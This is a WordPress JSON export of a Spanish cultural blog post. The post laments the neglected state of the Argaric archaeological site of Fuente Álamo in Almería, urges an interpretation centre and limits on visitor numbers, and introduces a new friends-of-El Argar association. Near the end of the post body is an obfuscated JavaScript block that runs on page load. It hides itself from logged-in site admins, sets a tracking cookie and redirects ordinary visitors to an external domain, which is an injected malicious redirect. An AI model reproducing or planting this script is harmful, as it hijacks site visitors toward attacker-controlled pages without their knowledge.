decoding=\"async\" class=\"alignnone size-medium wp-image-1725\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto........-300x184.jpg\" alt=\"Art blog Almeria Museo abierto........\" width=\"300\" height=\"184\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto........-300x184.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto........-1024x629.jpg 1024w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto.........jpg 1515w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p class=\"western\" align=\"center\"><span style=\"font-size: small\"><i><b>Panor\u00e1mica de la estrat\u00e9gica situaci\u00f3n de un poblado arg\u00e1rico de monta\u00f1a<\/b><\/i><\/span><\/p>\n<ul>\n<li>\n<p class=\"western\"><span style=\"color: #333333\">La situaci\u00f3n actual de este yacimiento arqueol\u00f3gico dista mucho de lo que deber\u00eda ser en realidad. Un magnifico exponente de lo que es un poblado arg\u00e1rico de monta\u00f1a, de esta zona del levante almeriense, desde donde irradi\u00f3 esta cultura a todo el SE peninsular.<\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"color: #333333\">El estado actual de abandono del yacimiento lleva de nuevo a preguntarse cu\u00e1l va a ser el futuro de nuestro Patrimonio Hist\u00f3rico-Arqueol\u00f3gico.<\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"color: #333333\">Si no empezamos por intentar captar el inter\u00e9s del p\u00fablico profano por la riqueza hist\u00f3rica que poseemos, \u00bfc\u00f3mo pretender que valoren y respeten?<\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"color: #333333\">Y esa misma misi\u00f3n est\u00e1 en manos de quienes nos dedicamos a dar a conocer las maravillas que poseemos, con el apoyo incondicional de las administraciones pol\u00edticas. Es urgente y necesaria una pol\u00edtica cultural para su puesta en valor.<\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"color: #333333\">La dejadez de yacimientos arqueol\u00f3gicos como el que nos ocupa, y otros no menos importantes, tambi\u00e9n relevantes de otras etapas hist\u00f3ricas como lo es el conjunto de Villaricos, empieza por cosas tan simples como el absoluto descuido en su preservaci\u00f3n, despu\u00e9s de su excavaci\u00f3n; en la falta de se\u00f1alizaci\u00f3n y musealizaci\u00f3n al aire libre que conduzcan a visitas dignas, y no que terminen en la imagen de desolaci\u00f3n que nos ofrecen con estas visitas organizadas. <\/span><\/p>\n<\/li>\n<li><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto.........j.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1728\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto.........j-300x200.jpg\" alt=\"Art blog Almeria Museo abierto.........j\" width=\"300\" height=\"200\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto.........j-300x200.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto.........j-1024x682.jpg 1024w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto.........j.jpg 1064w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/li>\n<\/ul>\n<p class=\"western\" align=\"center\"><span style=\"font-size: small\"><i>Cisterna de la acr\u00f3polis da\u00f1ada por enraizamiento de vegetaci\u00f3n arbustiva<\/i><\/span><\/p>\n<p class=\"western\"><b>EL DESOLADO ABANDONO DE UN YACIMIENTO ARQUEOL\u00d3GICO<\/b><\/p>\n<ul>\n<li>\n<p class=\"western\">Como se observa en cada una de las visitas anuales que se realizan a este importante yacimiento arqueol\u00f3gico, gran parte \u2013por no decir todo- de los restos de muros y perfiles est\u00e1n gravemente da\u00f1ados y el resto ha desaparecido, y lo que a\u00fan se ve est\u00e1n muy deteriorados por la erosi\u00f3n y el da\u00f1o causado por las visitas incontroladas.<\/p>\n<\/li>\n<li>\n<p class=\"western\">Esto es una demoledora conclusi\u00f3n de la que todos los asistentes a esta visita guiada somos testigos.<\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"color: #000000\">Las razones de este deterioro son variadas: el explosivo c\u00f3ctel que crea el efecto l\u00f3gico del paso del tiempo mezclado con la escasa \u2013mejor dicho- nula conservaci\u00f3n preventiva de la consolidaci\u00f3n de estructuras -ya efectuada por el Instituto Arqueol\u00f3gico Alem\u00e1n-, para que no se desmoronen los morteros de su f\u00e1brica.<\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\">Pero, tambi\u00e9n influye el vandalismo humano protagonizado por quienes pisotean y desmoronan los restos constructivos dejados visibles para su contemplaci\u00f3n.<\/p>\n<\/li>\n<li>\n<p class=\"western\">Todo ello debilita las estructuras, que van resquebraj\u00e1ndose y desmoron\u00e1ndose y que el efecto de la lluvia termina por disgregar.<\/p>\n<\/li>\n<li>\n<p class=\"western\">De hecho, ya ha sucedido en varias zonas de estas ruinas arqueol\u00f3gicas, cuando despu\u00e9s de unas lluvias torrenciales todo se derrumba tras un prolongado aguacero.<\/p>\n<\/li>\n<li>\n<p class=\"western\">Este lastimoso estado queda en evidencia en cuanto el visitante pone los pies sobre estas ruinas.<\/p>\n<\/li>\n<li>\n<p class=\"western\">La falta de programas de visitas guiadas controladas y limitadas a un reducido n\u00ba de visitas, el vallado perimetral, las aglomeraciones en estas zonas arqueol\u00f3gicas son un peligro constante.<\/p>\n<\/li>\n<li>\n<p class=\"western\">Hay que poner coto, restringiendo el n\u00ba de visitantes.<\/p>\n<\/li>\n<li>\n<p class=\"western\">Alertamos, como expertos en Patrimonio, de que es demasiado para estas ruinas de piedras, por la tragedia que causan.<\/p>\n<\/li>\n<li>\n<p class=\"western\">Es una pena ver c\u00f3mo en pocas d\u00e9cadas estamos destruyendo nuestro Patrimonio hist\u00f3rico de milenios.<\/p>\n<\/li>\n<li>\n<p class=\"western\">Lamentamos que a\u00fan no se hayan tomado medidas, despu\u00e9s de varias d\u00e9cadas de haber sido excavado este yacimiento y dejado a su suerte, al aire libre y sin medidas de protecci\u00f3n.<\/p>\n<\/li>\n<li><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-Jornadas-Almer\u00eda-un-Museo-a-cielo-abierto..jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1717\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-Jornadas-Almer\u00eda-un-Museo-a-cielo-abierto.-300x178.jpg\" alt=\"Art Jornadas Almer\u00eda un Museo a cielo abierto.\" width=\"300\" height=\"178\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-Jornadas-Almer\u00eda-un-Museo-a-cielo-abierto.-300x178.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-Jornadas-Almer\u00eda-un-Museo-a-cielo-abierto..jpg 640w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/li>\n<\/ul>\n<p class=\"western\" align=\"center\"><span style=\"font-size: small\"><i>Deterioros por abandono y falta de mantenimiento anual<\/i><\/span><\/p>\n<p class=\"western\"><span style=\"color: #333333\"><b>URGE LA CONSTRUCCI\u00d3N DE UN CENTRO DE INTERPRETACI\u00d3N EN EL MISMO YACIMIENTO ARQUEOL\u00d3GICO<\/b><\/span><\/p>\n<ul>\n<li>\n<p class=\"western\"><span style=\"color: #333333\">El yacimiento arqueol\u00f3gico de Fuente \u00c1lamo necesita de un plan director de intervenci\u00f3n para su reconversi\u00f3n en un <\/span><span style=\"color: #333333\"><i><b>Centro de Interpretaci\u00f3n del Poblado Arg\u00e1rico<\/b><\/i><\/span><span style=\"color: #333333\"> y aprovechando estas <\/span><span style=\"color: #333333\"><i>Jornadas Almer\u00eda, un Museo a cielo abierto<\/i><\/span><span style=\"color: #333333\">, <\/span><span style=\"color: #333333\">adoptar las medidas apropiadas para que yacimiento arqueol\u00f3gico contin\u00fae en la relaci\u00f3n de los diversos Centros de Interpretaci\u00f3n creados en la provincia de Almer\u00eda. <\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"color: #333333\">Consideramos imprescindible que el yacimiento disponga de un plan director que impida que se produzcan \u00abagresiones y deterioros\u00bb en el entorno, as\u00ed como que se construya un Centro de Interpretaci\u00f3n para los visitantes y que se garantice de forma adecuada la conservaci\u00f3n del mismo, con un mantenimiento anual de reparaciones de estructuras y un vallado perimetral del \u00e1rea arqueol\u00f3gica.<\/span><\/p>\n<p>Para nuestro colectivo como expertos en Patrimonio, el cortijo existente en el lugar es id\u00f3neo para albergar un Centro Muse\u00edstico del Poblamiento Arg\u00e1rico, al que deber\u00edan trasladarse toda la informaci\u00f3n aportada por los a\u00f1os de investigaci\u00f3n y como muestra material de r\u00e9plicas arqueol\u00f3gicas encontradas en este enclave.<\/li>\n<li>\n<p class=\"western\"><span style=\"color: #333333\">La propuesta es la adquisici\u00f3n del edificio y remodelarlo para transformarlo en un museo, es perfecta incluso por el enclave de su entorno geogr\u00e1fico, con el apoyo de las administraciones competentes y colaboraci\u00f3n a trav\u00e9s de la reci\u00e9n creada Asociaci\u00f3n de Amigos de El Argar (AAA). Y, c\u00f3mo no, dedicarlo al nombre del arque\u00f3logo Dr.Schubart, como homenaje a su labor investigadora en este yacimiento arqueol\u00f3gico.<\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"color: #333333\">Desgraciadamente no es un caso \u00fanico el de Fuente \u00c1lamo, pero si estas simples palabras de denuncia sirven para abrir un poco m\u00e1s los ojos ante situaciones similares y actuar contra ellas, bien venidas sean.<\/span><\/p>\n<\/li>\n<li><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto...........j.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1727\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto...........j-300x200.jpg\" alt=\"Art blog Almeria Museo abierto...........j\" width=\"300\" height=\"200\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto...........j-300x200.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto...........j-1024x682.jpg 1024w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto...........j.jpg 1064w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/li>\n<\/ul>\n<p class=\"western\" align=\"center\"><span style=\"font-size: small\"><i>Cistas de la necr\u00f3polis pisoteadas<\/i><\/span><\/p>\n<p class=\"western\" align=\"center\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Copia-de-fuente-\u00e1lamo.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1743\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Copia-de-fuente-\u00e1lamo-300x233.jpg\" alt=\"Copia de fuente \u00e1lamo\" width=\"300\" height=\"233\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Copia-de-fuente-\u00e1lamo-300x233.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Copia-de-fuente-\u00e1lamo.jpg 787w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p class=\"western\" align=\"center\">Visita Fuente \u00c1lamo<\/p>\n<p class=\"western\" align=\"center\">Por cuestiones de criterio profesional, expresamos que la masificaci\u00f3n de grupos de visitas numerosos y sin control de acceso limitado, deteriora los yacimientos arqueol\u00f3gicos. Por razones de conservaci\u00f3n, las plazas deber\u00edan limitarse a entre 15 y 20 personas.<\/p>\n<p class=\"western\" align=\"center\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Copia-de-grupo-hipogeo-villaricos.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1744\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Copia-de-grupo-hipogeo-villaricos-218x300.jpg\" alt=\"Copia de grupo hipogeo villaricos\" width=\"218\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Copia-de-grupo-hipogeo-villaricos-218x300.jpg 218w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Copia-de-grupo-hipogeo-villaricos-743x1024.jpg 743w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Copia-de-grupo-hipogeo-villaricos.jpg 787w\" sizes=\"(max-width: 218px) 100vw, 218px\" \/><\/a><\/p>\n<p class=\"western\" align=\"center\">Visita hipogeos Villaricos<\/p>\n<p class=\"western\" align=\"center\"><span style=\"color: #333333\"><span style=\"font-size: large\"><b>La reci\u00e9n creada Asociaci\u00f3n de Amigos de El Argar, en apoyo de este Patrimonio Arqueol\u00f3gico<\/b><\/span><\/span><\/p>\n<p class=\"western\"><span style=\"color: #333333\">Y siguiendo con las reflexiones, decir que<\/span> a\u00fan estamos lejos del necesario conocimiento (que no reconocimiento) de nuestro Patrimonio. Incluso aqu\u00ed mismo en la comarca del Levante almeriense, en el centro de la cultura del Argar, hay demasiada gente que desconoce \u00e9ste importante aspecto de nuestra historia. Y, Para ello se ha creado la \u00ab<i>Asociaci\u00f3n Amigos el El Argar<\/i>\u00ab, y por eso es tan importante para todos, dar a conocer esta Asociaci\u00f3n.<\/p>\n<p class=\"western\">Que pretende llevar a buen fin los objetivos siguientes:<\/p>\n<p class=\"western\"><i>-Divulgar la cultura de El Argar, el conocimiento de la \u00e9poca del bronce del Sureste peninsular, para que penetre en el tejido social, \u201cpara el aumento del conocimiento del pasado y la valoraci\u00f3n cultural de los yacimientos\u201d y su protecci\u00f3n, as\u00ed como buscar los or\u00edgenes, priorizando las nuevas tendencias interpretativas sobre su origen desde un prisma funcionalista y materialista sin olvidar las historicistas.<\/i><\/p>\n<p class=\"western\"><i>-Comprender las caracter\u00edsticas de la cultura arg\u00e1rica y el valor de los restos \u201cin situ\u201d, para obtener una informaci\u00f3n correcta.<\/i><\/p>\n<p class=\"western\"><i>-Valorar el patrimonio arqueol\u00f3gico como elemento de identidad cultural. Aproximarse al mundo funerario como un elemento importante para conocer la cultura material y sus costumbres.<\/i><\/p>\n<p class=\"western\"><i>-Llamar la atenci\u00f3n y dar a conocer la gran importancia de la cultura de El Argar y sus yacimientos, la puesta en valor de los mismos.<\/i><\/p>\n<p class=\"western\"><i>-Fomentar la creaci\u00f3n de un Museo de la Cultura Arg\u00e1rica\u201d, y fomentar el conocimiento tanto en sus actividades sociales como culturales.<\/i><\/p>\n<p class=\"western\"><i>-Contar con una serie de experiencias did\u00e1cticas que sirvan de apoyo a los ense\u00f1antes. Se pretende con la asociaci\u00f3n potenciar el \u201cMuse \u201d para que se convierta en un elemento vehicular y un laboratorio de ideas e investigaci\u00f3n de nuestro pasado. La intenci\u00f3n de la asociaci\u00f3n es trazar caminos que converjan desde distintos rincones donde se extendi\u00f3 la cultura de El Argar, con la participaci\u00f3n de todos ellos y que a este proyecto pueda ir adhiri\u00e9ndose otras entidades de las ciudades y pueblos del Sureste donde existi\u00f3 la cultura de El Argar.<\/i><\/p>\n<p class=\"western\"><i>-Intentar que este proyecto de la \u201cAsociaci\u00f3n Argar\u201d, sea un peque\u00f1o avance y el germen de una futura difusi\u00f3n donde se de a conocer de forma sistem\u00e1tica toda la informaci\u00f3n extra\u00edda de todos los yacimientos de Fuente Vermeja, Lugarico Viejo, Fuente \u00c1lamo, Gatas, etc\u2026 b\u00e1sicamente del Sureste peninsular. <\/i><\/p>\n<p class=\"western\"><i>-Toda esta actividad que se pretende realizar se explica porque a\u00fan en la actualidad, este paisaje Siretiano es una zona con un alto potencial de informaci\u00f3n hist\u00f3rica. Sin embargo, su preservaci\u00f3n se encuentra en situaci\u00f3n cr\u00edtica por la profunda transformaci\u00f3n de los \u00faltimos a\u00f1os donde los mayores peligros se enra\u00edzan con la agricultura extensiva, el desarrollo tur\u00edstico y las grandes obras de infraestructura. <\/i><\/p>\n<p class=\"western\"><i>Si esto es perceptible a nivel general, la mayor fragilidad esta asociada a los lugares arqueol\u00f3gicos correspondientes a las primeras etapas pastoriles, por la escasa envergadura y visibilidad que los caracteriza, de tal forma que su informaci\u00f3n patrimonial corre peligro de desaparecer si no activamos medidas de gesti\u00f3n adecuadas a sus particulares circunstancias y desde la asociaci\u00f3n ARGAR se pretende acometer campa\u00f1as de difusi\u00f3n para sensibilizar a la sociedad y poderes p\u00fablicos.<\/i><\/p>\n<p class=\"western\"><i>El compromiso que asumimos es importante ya que los yacimientos arqueol\u00f3gicos no son una herencia de nuestros padres sino un pr\u00e9stamo de nuestros hijos y no los podemos defraudar. Es el reto que nos hemos marcado.<\/i><\/p>\n<p class=\"western\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/CCI01012002_00268.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1736\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/CCI01012002_00268-300x210.jpg\" alt=\"CCI01012002_00268\" width=\"300\" height=\"210\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/CCI01012002_00268-300x210.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/CCI01012002_00268-1024x718.jpg 1024w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/CCI01012002_00268.jpg 1797w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p class=\"western\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto............j.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1726\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto............j-300x210.jpg\" alt=\"Art blog Almeria Museo abierto............j\" width=\"300\" height=\"210\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto............j-300x210.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/12\/Art-blog-Almeria-Museo-abierto............j-1024x718.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p class=\"western\" align=\"right\"><span style=\"color: #333333\"><span style=\"font-size: small\">\u00a0<\/span><\/span><\/p>\n<p><script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.areyourobots.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>III JORNADAS ARQUEOL\u00d3GICAS. ALMER\u00cdA, UN MUSEO A CIELO ABIERTO EL LEGADO ARQUEOL\u00d3GICO DE LUIS SIRET<\/p>\n","protected":false},"author":7,"featured_media":1725,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[105,109,4],"tags":[116,117,115,114,118],"class_list":["post-1714","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-actividades","category-historia","category-museo","tag-arqueologia","tag-fuente-alamo","tag-juan-cuadrado","tag-luis-siret","tag-pedro-flores"],"_links":{"self":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/1714","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/comments?post=1714"}],"version-history":[{"count":6,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/1714\/revisions"}],"predecessor-version":[{"id":1746,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/1714\/revisions\/1746"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media\/1725"}],"wp:attachment":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media?parent=1714"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/categories?post=1714"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/tags?post=1714"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}